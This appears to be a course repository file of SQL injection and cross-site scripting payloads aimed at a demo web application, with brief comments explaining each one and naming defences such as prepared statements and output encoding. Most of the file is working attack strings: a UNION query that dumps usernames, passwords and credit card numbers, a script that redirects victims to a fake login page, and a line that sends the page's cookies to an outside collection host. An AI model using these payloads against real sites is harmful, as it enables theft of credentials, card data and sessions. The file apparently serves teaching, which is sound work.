jetty / xss.txt
Mark George on 28 Sep 2017 910 bytes Initial commit.
http://139.80.81.78:8080/injection/


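// basic SQL injection: the quote closes the string literal and `or 1=1` makes the condition always true; bound parameters (prepared statements) prevent this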
' or 1=1;--


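// get admin's credentials (as written, this only UNIONs the constant 'WOOHOO!' into the result, showing that UNION injection works)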
'or 1=1 union select 'WOOHOO!' from users order by name desc; --

// get entire users table
'or 1=1 union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name order by name desc; --

// change color (XSS: proves injected script runs in the page; encoding output on render prevents it)
food<script>document.body.style.backgroundColor='#FF0000'</script>

// change back button (HTML injection; the trailing <!-- presumably comments out the markup that follows)
food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!--

// fake login
<script>alert('Session timed out.  Please log in to continue.');window.location='http://139.80.81.78:8080/injection/herephishyphishy.jsp'</script>

// display cookies (cookies flagged HttpOnly do not appear in document.cookie)
<script>alert(document.cookie)</script>

// send cookies to requestb.in
<script>window.location='https://requestb.in/1jledlk1?'+document.cookie</script>

// setting cookie via console
document.cookie = "JSESSIONID=?"